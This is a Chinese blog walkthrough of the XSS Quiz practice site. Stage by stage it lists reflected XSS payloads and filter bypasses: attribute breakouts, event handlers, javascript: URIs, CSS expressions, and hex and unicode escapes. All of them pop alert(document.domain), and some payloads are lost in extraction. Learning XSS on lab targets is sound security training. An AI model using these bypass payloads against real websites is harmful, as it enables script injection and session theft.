28、XSS常见payload

简介: 28、XSS常见payload

环境:http://xss-quiz.int21h.jp

一、Stage #1 无过滤xss漏洞

1、随便输入字符:123

0a2653c851af460fa595bd959398a8f1.png

2、输入payload:

0eacb84100b54626af849e6b562bf92a.png

3、弹出对话框,说明存在xss漏洞

2d65d23f6d4748949b924e4057485923.png

二、Stage #2 属性中的xss漏洞

1、在窗口中输入payload:,查看审查元素,payload被写在一个标签中

4cebaac233b3433da32a72337a77fc60.png

2、重新构造payload,先闭合标签:

">

6de278e6d6694ce5bb08e7e842b7e74b.png

或者 "οnmοuseοver=alert(document.domain)>

7a399525ddec4b77923c464820b33738 (1).png

3、成功弹出

7a399525ddec4b77923c464820b33738.png

三、Stage #3 选择列表框中的xss漏洞

1、点击search,抓包

0a2653c851af460fa595bd959398a8f1.png 0eacb84100b54626af849e6b562bf92a.png

2、修改post数据,添加payload:,发送到repeater,send

2d65d23f6d4748949b924e4057485923.png

3、右击响应信息,show response in browser,复制到浏览器打开

2e9b90b2ca334476abebe75bafe6eeaa.png 4cebaac233b3433da32a72337a77fc60.png 6de278e6d6694ce5bb08e7e842b7e74b.png

四、隐藏提交参数的xss漏洞

">

1、随便输入字符,search,抓包

0a2653c851af460fa595bd959398a8f1.png 0eacb84100b54626af849e6b562bf92a.png

2、在隐藏参数后面添加payload,forward,查看审查元素

2d65d23f6d4748949b924e4057485923.png 2e9b90b2ca334476abebe75bafe6eeaa.png

3、闭合参数,重新构造payload:">,发包,成功弹出

4cebaac233b3433da32a72337a77fc60.png

五、HTML事件中的xss漏洞

1、直接输入payload:">,审查元素,字符被转义了,

0a2653c851af460fa595bd959398a8f1.png

2、重新构造payload:"οnmοuseοver=“alert(document.domain)

或者” οnclick=“alert(document.domain)”

3、成功弹出

0eacb84100b54626af849e6b562bf92a.png

六、空格分隔属性中的xss漏洞

1、随便输入字符111 222 333

4cebaac233b3433da32a72337a77fc60.png

2、输入字符串

6de278e6d6694ce5bb08e7e842b7e74b.png

3、构造payload:111 οnclick=alert(document.domain),成功弹出

7a399525ddec4b77923c464820b33738 (1).png

七、JavaScript为协议触发

1、输入payload:javascript:alert(document.domain),成功弹出

0a2653c851af460fa595bd959398a8f1.png

八、绕过过滤xss漏洞

1、输入payload:">,审查元素,domain被过滤了

0eacb84100b54626af849e6b562bf92a.png

2、重新构造payload:">

2d65d23f6d4748949b924e4057485923.png

2e9b90b2ca334476abebe75bafe6eeaa.png

九、绕过替换script和on事件的xss漏洞

1、输入,script被替换成xscript

0a2653c851af460fa595bd959398a8f1.png

2、闭合payload,并修改100" οnmοuseοver="alert(document.domain)

0eacb84100b54626af849e6b562bf92a.png

on事件,被替换成onxxx

3、使用伪协议加“ ”绕过

100"> xss

十、利用IE特性绕过过滤",可以闭合双引号,οnmοusemοve=alert(document.domain)

仅针对IE浏览器

十一、利用css特性绕过过滤",IE低版本

background-color:#f00;background:url(“javascript:alert(document.domain);”);

2d65d23f6d4748949b924e4057485923.png

十二、利用css执行js

xss:expres/**/sion(if(!window.x){alert(document.domain);window.x=1;})

2e9b90b2ca334476abebe75bafe6eeaa.png

十三、十六进制绕过过滤

1、输入

0a2653c851af460fa595bd959398a8f1.png

2、<>都被转义了,用十六进制代替

\x3cscript\x3ealert(document.domain);\x3c/script\x3e

0eacb84100b54626af849e6b562bf92a.png 2d65d23f6d4748949b924e4057485923.png

十四、unicode绕过过滤

1、输入\x3c \x3e,不能绕过

0a2653c851af460fa595bd959398a8f1.png

2、重新利用unicode构造payload:

\u003cscript\u003ealert(document.domain);\u003c/script\u003e

0eacb84100b54626af849e6b562bf92a.png 2d65d23f6d4748949b924e4057485923.png

禁止非法,后果自负

目录
相关文章
|
7月前
|
移动开发 JavaScript 前端开发
分享一些XSS Payload
分享一些XSS Payload
128 0
|
安全 前端开发 JavaScript
28、XSS常见payload
28、XSS常见payload
468 0
28、XSS常见payload
|
前端开发 JavaScript
XSS payload 大全
收集的一些XSS payload,主要分为五大类,便于查阅。 #第一类:Javascript URL link link link Hello Hello link link link link Hello link Hello link link link ...
1752 0
|
Web App开发 安全
Web安全系列(二):XSS 攻击进阶(初探 XSS Payload)
上一章我谈到了 XSS 攻击的几种分类以及形成的攻击的原理,并举了一些浅显的例子,接下来,我就阐述什么叫做 `XSS Payload` 以及从攻击者的角度来初探 XSS 攻击的威力。
3069 0
|
安全 JavaScript Web App开发
|
1月前
|
JavaScript 安全 前端开发
同源策略如何防止 XSS 攻击?
【10月更文挑战第31天】同源策略通过对 DOM 访问、Cookie 访问、脚本执行环境和跨源网络请求等多方面的严格限制,构建了一道坚实的安全防线,有效地防止了 XSS 攻击,保护了用户在网络浏览过程中的数据安全和隐私。
99 49
|
5月前
|
存储 安全 JavaScript
手摸手带你进行XSS攻击与防御
当谈到网络安全和信息安全时,跨站脚本攻击(XSS)是一个不可忽视的威胁。现在大家使用邮箱进行用户认证比较多,如果黑客利用XSS攻陷了用户的邮箱,拿到了cookie那么就可以冒充你进行收发邮件,那真就太可怕了,通过邮箱验证进行其他各种网站的登录与高危操作。 那么今天,本文将带大家深入了解XSS攻击与对应的防御措施。
|
1月前
|
安全 前端开发 Java
Web安全进阶:XSS与CSRF攻击防御策略深度解析
【10月更文挑战第26天】Web安全是现代软件开发的重要领域,本文深入探讨了XSS和CSRF两种常见攻击的原理及防御策略。针对XSS,介绍了输入验证与转义、使用CSP、WAF、HTTP-only Cookie和代码审查等方法。对于CSRF,提出了启用CSRF保护、设置CSRF Token、使用HTTPS、二次验证和用户教育等措施。通过这些策略,开发者可以构建更安全的Web应用。
87 4
|
1月前
|
安全 Go PHP
Web安全进阶:XSS与CSRF攻击防御策略深度解析
【10月更文挑战第27天】本文深入解析了Web安全中的XSS和CSRF攻击防御策略。针对XSS,介绍了输入验证与净化、内容安全策略(CSP)和HTTP头部安全配置;针对CSRF,提出了使用CSRF令牌、验证HTTP请求头、限制同源策略和双重提交Cookie等方法,帮助开发者有效保护网站和用户数据安全。
70 2
|
1月前
|
存储 安全 Go
Web安全基础:防范XSS与CSRF攻击的方法
【10月更文挑战第25天】Web安全是互联网应用开发中的重要环节。本文通过具体案例分析了跨站脚本攻击(XSS)和跨站请求伪造(CSRF)的原理及防范方法,包括服务器端数据过滤、使用Content Security Policy (CSP)、添加CSRF令牌等措施,帮助开发者构建更安全的Web应用。
92 3